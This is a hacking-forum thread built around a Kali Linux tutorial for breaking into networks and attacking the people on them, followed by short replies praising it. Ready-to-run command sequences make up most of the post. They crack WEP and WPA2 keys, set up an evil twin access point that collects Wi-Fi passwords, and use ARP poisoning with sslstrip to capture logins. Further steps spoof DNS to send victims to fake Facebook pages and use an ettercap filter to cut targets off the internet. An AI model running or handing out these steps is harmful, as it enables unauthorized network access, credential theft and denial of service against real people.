Login LOGIN WITH FACEBOOK Register LOGIN TO REMOVE THE ADS


Scroll me back to the top !





Tutorial [Kali Linux] Get access, Find and attack into a network
Author Message
hunt3r972 Offline
Hacker
Posts: 349

Reputation: 6
Thanks received: 30
Thanks given: 17
HackCommunity Coins: 260
Post: #1
[Kali Linux] Get access, Find and attack into a network
TABLE OF CONTENT

I. Get Into The Network
  • Wired network
  • WEP protected
  • WPA2 protected

II. Find informations about the network and the host
  • The network
  • The nodes

III. Scan a target (OS Fingerprinting)

IV. Attacking the victim
  • MITM Attack
  • DNS Spoofing Attack
  • DOS Attack

I. Get Into The Network
Firstly, you must know what kind of network you are attacking: Wifi or Wired network ?
  • Wired Network
If you are on a Wired network, you are lucky, you haven't a lot to do: connect an ethernet cable and you're ok. If you haven't a physic access, you will have to find a way to get it.

1. Brute Force Attack
If the network is a Wifi network protected with a WEP key, use this script to crack the key. WEP key is the worst protection for a Wifi network. Brute Force attack are very efficient and fast against it

So here:
MACADDRESSAP = MAC address of the access point
MACADDRESSVICTIM = MAC address of the victim connected to the access point
CHANNEL = channel used by the access point
APNAME = Access Point Name

Quote:New terminal

1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. airodump-ng mon0 [it will list the detected access point on mon0]

4. airodump-ng -c CHANNEL-w wepcrack --bssid MACADDRESSAP mon0 [focus the scan on the victim network]
New terminal

5. aireplay-ng -1 0 -e APNAME -a MACADDRESSAP -b MACADDRESSAP -h MACADDRESSVICTIM mon0 [deauthentication + fake authentication on the victim network by mac address dumping]

New terminal

6. aireplay-ng -3 -e APNAME -a MACADDRESSAP -b MACADDRESSAP -h MACADDRESSVICTIM -x 600 -r wepcrack*.cap mon0 [ARP request replay attack on the access point. It will put it in the file named wepcrack.cap. Wait for ~20 000 IVS]

New terminal

7. aircrack-ng wepcrack*.cap [start brute force cracking on the data stored in the file wepcrack.cap]
  • WPA2 protected
WPA2 encryption is very hard to crack. A good WPA2 key with caps, numbers and normal chars with 20 characters is not impossible to crack, but you will need over ten years to crack it. I bet 2000$ that you will give up before finding it. Anyway, I will present five ways to crack it: The dictionnary attack, The brute force attack (with and without CUDA), the evil twin method and the WPS Pin brute force attack

1. Dictionnary Attack
Quote:New terminal
1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. airodump-ng mon0 [it will list the detected access point on mon0]

4. airodump-ng -c CHANNEL -w wpacrack --bssid MACADDRESSAP --ivs mon0 [focus the scan on the victim network]

New terminal

5. aireplay-ng -0 1 -a MACADDRESSAP -c MACADDRESSVICTIM mon0 [handshaking the victim access point by deauthentication + fake authentication by mac address dumping]

New terminal

6. aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs [start the comparison betweeen the data stored in wpecrack-01.ivs and the dictionnary file which is located in ~/pentest/passwords/john/password.lst]

2. Brute Force Attack
If you have informations about the lenght and the chars in the password, you can do more precise password generation. Please follow this tutorial to understand how it works
http://www.hackcommunity.com/Thread-Word...ght=crunch

Quote:New terminal
1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. airodump-ng mon0 [it will list the detected access point on mon0]

4. airodump-ng -c CHANNEL -w wpacrack --bssid MACADDRESSAP --ivs mon0 [focus the scan on the victim network]

New terminal

5. aireplay-ng -0 1 -a MACADDRESSAP -c MACADDRESSVICTIM mon0 [handshaking the victim access point by deauthentication + fake authentication by mac address dumping]

New terminal

6. /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ADRESSEMACAP -w [start generating all possibilities with mixalpha-numeric chars between 8 and 16 chars and compare with the data stored in wpacrack-01.ivs]

3. Brute Force Attack (CUDA)
You will have to install pyrit
Quote:go to http://code.google.com/p/pyrit/downloads/list and download pyrit and cpyrit-cuda

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Quote:New terminal
1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. airodump-ng mon0 [it will list the detected access point on mon0]

4. airodump-ng -c CHANNEL -w wpacrack --bssid MACADDRESSAP mon0 [focus the scan on the victim network]

New terminal

5. aireplay-ng -0 1 -a MACADDRESSAP -c MACADDRESSVICTIM mon0 [handshaking the victim access point by deauthentication + fake authentication by mac address dumping]

New terminal

6. /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ADRESSEMACAP -i - attack_passthrough [start generating all possibilities with mixalpha-numeric chars between 8 and 16 chars and compare with the data stored in wpacrack-01.ivs]

If you have an error:

a. pyrit -r wpacrack-01.cap -o new.cap stripLive

b. /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ADRESSEMACAP -i - attack_passthrough

4. Evil Twin Attack

Start apache2: /etc/init.d/apache2 start
Start mysql: /etc/init.d/mysql start

Download this file http://www.4shared.com/file/b1FfNjdd/Ver...2=403tNull
You can use these free accounts to dowload it http://www.bugmenot.com/view/4shared.com

Put the files in /var/www/ -> Type "localhost" in your browser without the " " to try if it works

Quote:1. airmon-ng start wlan0

2. airodump-ng mon0

New terminal

3. cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.backup

4. nano /etc/dhcp/dhcpd.conf

ddns-update-style interim;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}

5. airbase-ng -e "ACCESPOINTNAME" -c CHANNEL -a MACACCESPOINT mon0

New terminal

6. ifconfig at0 up

7. ifconfig at0 192.168.2.129 netmask 255.255.255.128

8. route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

9. iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o INTERFACECONNECTERAINTERNET -j MASQUERADE
echo > '/var/lib/dhcp/dhcpd.leases'

10. dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0

11. echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

12. Put files into /var/www/ -> Test it by typing the IP address of at0 in your web browser

13. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination ADRESSEIPat0:80
iptables -t nat -A POSTROUTING -j MASQUERADE

New terminal

14. airodump-ng mon0

15. airodump-ng --bssid ADRESSEMACAPVICTIM -c CHANNEL mon0

16. aireplay-ng -0 0 -a ADRESSEMACAP -c MACADRESSEVICTIME mon0

When the victim entered the key, stop deAuth and Airbase. He will reconnect to the real AP

17. mysql -u root -p
use wpa2;
select * from content;

Now you can take the WPA2 key in the mysql database and use it to connect on the access point. Of course this method will work with "stupid" users Grin If you have some knowledge in HTML / CSS you can try to do some templates looking like the one used by the ISP of your victim to make it look more "real".

5. WPS Pin Brute Force Attack

Quote:1. airmon-ng [list the available device for monitoring]

2. airmon-ng start wlan0 [enable monitoring mode on wlan0. Now use mon0 instead of wlan0]

3. wash -i mon0 [it will list the access point with WPS activated]

4. reaver -i mon0 -b MACADDRESSAP -vv [start brute force cracking on the WPS key]

Do you want to protect your wifi network? follow these rules:
Disable WPS
Change your WEP key for a WPA2 key
Use a 20+ chars key with normal chars, caps and numbers
Enable mac address filtering
Assign a computer name to each MAC address
Reduce your radio emission power
Change your router default login
Disable remote administration on your router (or change the port)

II. Finding informations about your network
Before starting doing manipulations, you must kn ow where you are. So you must find some basic informations
  • The network
Quote:ifconfig eth0/wlan0

eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx:
inet addr:172.23.137.73 Bcast:172.23.191.255 Mask:255.255.192.0
inet6 addr: fe80::f66d:4ff:fe1b:40a2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:518534 errors:0 dropped:0 overruns:0 frame:0
TX packets:6461 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:74181339 (74.1 MB) TX bytes:519778 (519.7 KB)
Interrupt:42 Base address:0x6000

So here I know that my ip address is 172.23.137.73 and the Mask is 255.255.192.0. By doing a "and logical" between my ip address and the Mask, I can know that my network address is 172.23.128.0. So here we have the main information about the network. How to do a logical and to find the network IP address ? you have to translate if octet in binary.

So for 172.23.137.73 I will have: 10101100.00010111.10001001.01001001
and for 255.255.255.192.0 I will have: 11111111.11111111.11000000.00000000

Now you will compare the first bit in the first octet of the HostIP with the first bit in the first octet in the Mask then the second bit in the first octet of the HostIP with the second bit in the first octet in the Mask etc. You must do it for every bits. The rule is: 0 and 0 = 0, 0 and 1 = 0 and 1 and 1 = 1
HostIP : 10101100.00010111.10001001.01001001
Mask : 11111111.11111111.11000000.00000000
Network address : 10101100.00010111.10000000.00000000

Now translate the binary network address in decimal and you have 172.23.128.0

Now only one information is missing: the gateway address. This one is very useful for attack like Man In The Middle. To find it, type:

Quote:route

Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 172.23.128.1 0.0.0.0 UG 100 0 0 eth0
172.23.128.0 * 255.255.192.0 U 0 0 0 eth0
  • The nodes
    ETHERAPE (GRAPHIC)
This must be the one graphic program I use
Quote:etherape -i eth0/wlan0 -m ip
It opens the GUI of etherape then go to View > Nodes. You will see a lot of IP address or Netbios name. Now you will have to find your target.

Finding a node IP address from his netbios name, or find his netbios name from his IP address
To be sure that your target is the correct target, you will have to find some basic informations.
Find a node ip address:
Quote:net lookup SOMEONE-PC
root@bt:~# net lookup SOMONE-PC
172.23.135.237

Check a node netbios name from is IP address:
Quote:nbtscan 172.23.135.237
root@bt:~# nbtscan 172.23.135.237
Doing NBT name scan for addresses from 172.23.135.237

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
172.23.135.237 SOMEONE-PC <server> <unknown> xx-xx-xx-xx-xx-xx

here you have basic informations. To have more specific informations about your target, follow the next step

nmap can also perform simple scans. You can use this command:

Quote:nmap -sn 172.23.130.0-255

type nmap --help to see which type of IP range can be used

III. Scan a target
Before starting attacking the target you chose, you must have some advanced informations like the opened port, the operating system etc. Why the ports ? because they are the opened door to talk with the victim. And why the OS ? because thanks to that, you will know for each OS you will have to search exploits.

Quote:nmap -sS -Pn 172.23.135.237 -A
It will scan TCP scan (-sS), use passive discovering instead of ICMP ping which is blocked by most of the antivirus (-Pn) and give informations about the OS (-A)
This is an example of scan with nmap:

Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-02 20:59 AST
Nmap scan report for 172.23.135.237
Host is up (0.00060s latency).
Not shown: 991 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
554/tcp open rtsp?
2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
10243/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Not Found
49158/tcp open msrpc Microsoft Windows RPC
50002/tcp open tcpwrapped

MAC Address: xx:xx:xx:xx:xx:xx (Quanta Computer)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::professional cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2 or Windows Server 2008
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: NETBIOSNAME-PC, NetBIOS user: <unknown>, NetBIOS MAC: xx:xx:xx:xx:xx:xx (Quanta Computer)
|_smbv2-enabled: Server supports SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Home Premium 7601 Service Pack 1 (Windows 7 Home Premium 6.1)
| NetBIOS computer name: NETBIOSNAME-PC
| Workgroup: WORKGROUP
|_ System time: 2012-12-02 21:33:24 UTC-4.5

TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 172.23.135.237


OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 238.11 seconds

After using nmap to check the OS and if there are opened ports, you can do an advanced scan to have more informations about the weaknesses of potential on the victim computer. To install nessus, you can use my tutorial

Quote:http://www.hackcommunity.com/Thread-How-...-on-BT5-R3

When you are on the web interface, go into scans, click on add in the menu barre, choose internal network, give a name to remember which computer you are scanning and type the IP address of your victim in the last area.

IV. Attacking the victim
It's important to say that a good antivirus will block these attacks. A well built network will make this attack harder to perform.

1. MITM Attack
The Man In The Middle attack is an attack where you can capture the traffic between the victim and the gateway thanks to an ARP poisoning. During this attack, the victim computer will think that you are the gateway and all his traffic will be sent to your computer. Then your computer will send it to the gateway to make him believe that he is always in communication with him (connection not interrupted).

To avoid this attack, get a good antivirus and set a static arp cache if possible

Normal situation:
Victim Computer <--------------------> Gateway <---------------------> INTERNET

Attack situtation:
Victim Computer <--------------------> Hacker Computer <---------------------> Gateway <---------------------> INTERNET

Quote:1. nano /etc/etter.conf ou nano /usr/local/etc

Make these modifications:

Quote: ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

#---------------
#Linux after Modification
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

CTRL+O to write out then CTRL+X to quit

Quote:2. echo 1 > /proc/sys/net/ipv4/ip_forward

3. cat /proc/sys/net/ipv4/ip_forward (0 = port forwarding not enabled, 1 = port forwarding enabled)

4. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

5. ettercap -TqM arp:remote /IPVICTIM/ /IPGATEWAY/ -i eth0/wlan0

New terminal

13. sslstrip -a -l 8080 -w capture.txt

TO STOP THIS ATTACK PUSH Q IN THE ETTERCAP CONSOLE BECAUSE YOU NEED TO Re-ARPING THE VICTIM ! DON'T USE CTRL+C ! THE SSLSTRIP CAN BE STOPPED WITH CTRL+C

Don't forget that you can change the listening port. See the example below:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 28960
sslstrip -a -l 28960 -w capture.txt

Just remember that the port used in the first command line must be the same in the sslstrip command line

To quickly summer how sslstrip works:
Most of people doesn't type " https://www.facebook.com " in their web browser. They use redirected url or links most of the time like http://www.facebook.com or http://facebook.com or link from google research. When you are the MITM, sslstrip will sniffs the traffic and each time someone is about to be redirected to a https website, it replaces "https" by "http". So the user is finally on a http website with no encrypted connection. This is why you can see the login in clear. If you type directly https://site.com you will notice that you brower advertise you about the missing/usurpated certificate, asking you to leave the page.

You can also use arpspoof to do it instead of ettercap

Quote:1. echo 1 > /proc/sys/net/ipv4/ip_forward

2. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

3. arpspoof -i INTERFACE -t GATEWAYIP IPVICTIM
arpspoof -i INTERFACE -t IPVICTIM GATEWAYIP

4. ettercap -Tq /IPPASSERELLE/ /IPVICTIME/ -i INTERFACE or USE WIRESHARK

5. sslstrip -a -l 8080 -w capture.txt

2. DNS Spoofing Attack
This attack can be very usefull to get informations about the victim or to steel password by making a fake web page with authentication system like facebook. With this attack when your victim will type http://www.facebook.com for example, it will redirect it for another website you made. You can run a php script to still informations like the public IP address, the web browser used etc. To understand how it works, you should read a doc about how DNS server works and how to understand the zone file in it. This is how to do this attack:

Quote:1. cd /usr/share/ettercap

2. nano etter.dns

An exemple of entry:
Quote:facebook.com A 74.125.140.103
*.facebook.com A 74.125.140.103
http://www.facebook.com PTR 74.125.140.103
When your victim will type http://www.facebook.com for example, he will be redirected to the ip address of your fake website. You can do it for *www.google.* or any other website. Then do this:

Quote:4. ettercap -i eth0/wlan0 -TqP dns_spoof -M ARP /IPVICTIM/ //

With the dig command, you can see how a DNS zone file looks. Some informations are missing (like the time between two actualizations, the TTL etc.). This is an example for google.com
Quote:root@bt:~# dig http://www.google.com

; <<>> DiG 9.7.0-P1 <<>> http://www.google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50936
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 4, ADDITIONAL: 4

;; QUESTION SECTION:
;www.google.com. IN A

;; ANSWER SECTION:
http://www.google.com. 187 IN A 74.125.130.147
http://www.google.com. 187 IN A 74.125.130.99
http://www.google.com. 187 IN A 74.125.130.103
http://www.google.com. 187 IN A 74.125.130.104
http://www.google.com. 187 IN A 74.125.130.105
http://www.google.com. 187 IN A 74.125.130.106

;; AUTHORITY SECTION:
google.com. 278473 IN NS ns4.google.com.
google.com. 278473 IN NS ns1.google.com.
google.com. 278473 IN NS ns2.google.com.
google.com. 278473 IN NS ns3.google.com.

;; ADDITIONAL SECTION:
ns1.google.com. 105387 IN A 216.239.32.10
ns2.google.com. 105387 IN A 216.239.34.10
ns3.google.com. 105387 IN A 216.239.36.10
ns4.google.com. 105387 IN A 216.239.38.10

;; Query time: 57 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Sun Dec 9 14:24:44 2012
;; MSG SIZE rcvd: 264

2. DOS Attack
During this attack, the victim will not be able to navigate on the internet.

Open a new terminal and type this in it:

Quote:if (ip.src == 'IPVICTIM' || ip.dst == 'IPVICTIM') {
drop();
kill();
msg("Packet Dropped\n");
}

Save it with the name dos.eft. Now type this in the terminal:

Quote:1. echo 1 > /proc/sys/net/ipv4/ip_forward

2. etterfilter dos.eft -o dos.ef

3. ettercap -TqF dos.ef -M ARP /IPVICTIM/ // -i eth0/wlan0

If you want to attack the whole subnet, just put: ettercap ... // // -i eth0/wlan0

Ok so here you learnt:
how to break a wep or wpa key to get into a network
how to find informations about the network you are connected on
how to find informations about a node (If you want to attack a specific target)
how to do some simple attacks like MITM attack, DNS Spoofing attack, DoS attack to break a node's connection (which can be blocked easily by a good antivirus)

This is just a small part of network exploitation. I will say that this part is accessible to every kids who wants to search just a little bit on google. The next step will be about the metasploit framework, a powerful tool for real pentesting. You will learn how to do a real pentesting on a network by using exploits, payloads, shellcods etc. I'll start writing a tutorial about it when I'll understand it correctly.
[Image: siggy.php?uid=31022]
(This post was last modified: 01-06-2014 02:02 AM by hunt3r972.)
11-21-2012 01:05 AM
SEARCH QUOTE
The following 8 user(s) thanked this post:
McSmc , diana32 , LunatiC , no13000 , symbios , Snipa , wnrwnrchxdnr , leperdev
hunt3r972 Offline
Hacker
Posts: 349

Reputation: 6
Thanks received: 30
Thanks given: 17
HackCommunity Coins: 260
Post: #2
RE: The best way to scan a Network
Just an up ... I really want to know if the way I do is good.
[Image: siggy.php?uid=31022]
11-24-2012 02:48 AM
SEARCH QUOTE
unknownAttacker Offline
Member
Posts: 290

Reputation: 0
Thanks received: 1
Thanks given: 0
HackCommunity Coins: 99
Post: #3
RE: The best way to scan a Network
it's generally good, although I prefer to add more stuff to nmap command as nmap has a lot of useful stuff. my command of choice is
Code:
nmap -sS -T4 -A -v -v -v -v --script address-info,auth-owners,banner,unusual-port
12-02-2012 11:10 PM
SEARCH QUOTE
hunt3r972 Offline
Hacker
Posts: 349

Reputation: 6
Thanks received: 30
Thanks given: 17
HackCommunity Coins: 260
Post: #4
RE: Find potential targets and informations on your network
Ok thanks. So now I've enough infos to start metasploiting the target ?
[Image: siggy.php?uid=31022]
12-03-2012 04:08 AM
SEARCH QUOTE
unknownAttacker Offline
Member
Posts: 290

Reputation: 0
Thanks received: 1
Thanks given: 0
HackCommunity Coins: 99
Post: #5
RE: Find potential targets and informations on your network
after running this nmap command, you'll know what services are running. search if those services have public, remote exploits. if they have then yes, you can metasploit. if no, you need to get creative and find other way in
12-03-2012 12:26 PM
SEARCH QUOTE
bluedog.tar.gz Online
Administrator
Posts: 5,800

Reputation: 188
Thanks received: 1130
Thanks given: 574
HackCommunity Coins: 6,938
Post: #6
RE: [Tutorial] Find potential targets and informations on your network
Nice thread, contains alot of usefull information for alot of us.

Thanks

[Image: IOiaU0o.gif]



Do you think you deserve an award?
Send me a Private message!

Be sure to check the update log once in a while!
http://hackcom.co/updates
12-12-2012 06:43 PM
WEBSITE SEARCH QUOTE
unknownAttacker Offline
Member
Posts: 290

Reputation: 0
Thanks received: 1
Thanks given: 0
HackCommunity Coins: 99
Post: #7
RE: [Tutorial] Find potential targets and informations on your network
hey, this tutorial is getting better and better. might be a great guide to WiFi exploitation soon!
12-13-2012 09:52 PM
SEARCH QUOTE
hunt3r972 Offline
Hacker
Posts: 349

Reputation: 6
Thanks received: 30
Thanks given: 17
HackCommunity Coins: 260
Post: #8
RE: [Tutorial] Find potential targets and informations on your network
I'll try to update it the most often I can
[Image: siggy.php?uid=31022]
12-14-2012 12:33 AM
SEARCH QUOTE
urge Offline
Member
Posts: 30

Reputation: 0
Thanks received: 0
Thanks given: 0
HackCommunity Coins: 34
Post: #9
RE: [Tutorial] Find potential targets and informations on your network
Very nice tutorial thanks for sharing.
12-14-2012 10:07 PM
SEARCH QUOTE
hunt3r972 Offline
Hacker
Posts: 349

Reputation: 6
Thanks received: 30
Thanks given: 17
HackCommunity Coins: 260
Post: #10
RE: [Tutorial] Find potential targets and informations on your network
I will make an update on this tutorial about MITM, DOS and DNS Spoof attack. I will stop using ettercap because this one has not been updated for a while so it's not stable. I think that I've found another way to do it but I must test it before. I'm now in school vacation so I will try evil twin method for wpa2 cracking

Do you want more theory in the tutorial (to understand what corresponds to which step)
[Image: siggy.php?uid=31022]
(This post was last modified: 12-21-2012 03:15 AM by hunt3r972.)
12-21-2012 03:12 AM
SEARCH QUOTE
Faner Offline
Hacker
Posts: 122

Reputation: 0
Thanks received: 9
Thanks given: 2
HackCommunity Coins: 53
Post: #11
RE: [Tutorial] Find potential targets and informations on your network
Nice tutorial. No idea where you got enough patience to write it. Just I wonder how long would it take to brute force 16 chars wpa2...

According to http://lastbit.com/pswcalc.asp it would take about 3346212221363636000 years Epic
And it's so if checking speed is 500000/sec.
(This post was last modified: 12-30-2012 09:59 PM by Faner.)
12-30-2012 07:34 PM
SEARCH QUOTE
V1P3R Offline
Need help? PM ME!!
Posts: 556

Reputation: 23
Thanks received: 122
Thanks given: 4
HackCommunity Coins: 567
Post: #12
RE: [Tutorial] Find potential targets and informations on your network
wow i just started backtrack and it helped me a lot
thanks dude
my facebook account:
http://zyan.me/SKzIZ
12-30-2012 07:58 PM
SEARCH QUOTE




Possibly Related Threads...
Thread: Author Replies: Views: Last Post
How to find out peoples ip.Easy&Simple Eleven 0 13 Today 08:39 PM
Last Post: Eleven
TUTORIAL How To Access Unsecured Security Cameras Around The World harnoor 6 748 Today 01:53 AM
Last Post: bluedog.tar.gz
TUTORIAL ARP Poisoning And MITM Attack via Cain [Windows] RootTheSystem 11 3,026 03-21-2014 04:03 AM
Last Post: Crash Override
TUTORIAL Network Scanning Ligeti 10 408 03-20-2014 04:26 PM
Last Post: Estrella1989
LFI to shell - exploiting Apache access log shp0ngl3 0 179 03-18-2014 03:16 AM
Last Post: shp0ngl3
TUTORIAL Monitor Your Network before Hacking Others Machine 0wi5py 4 295 03-14-2014 11:28 AM
Last Post: 0wi5py
[Tutorial] How To Get Access to Content Hidden for Guests in a Forum Coder-san 23 11,186 03-12-2014 06:42 AM
Last Post: irvinechan83
Hack and find the IP address of the chat buddy HrDe 43 4,777 02-20-2014 07:05 PM
Last Post: mushoofk007
TUTORIAL Find MAC add's through windows OS unohex 4 342 12-26-2013 01:51 AM
Last Post: unohex
TUTORIAL Man In The Middle attack (M.I.T.M.) for facebook Kafyhrer 6 1,464 11-23-2013 12:43 AM
Last Post: behehe hacked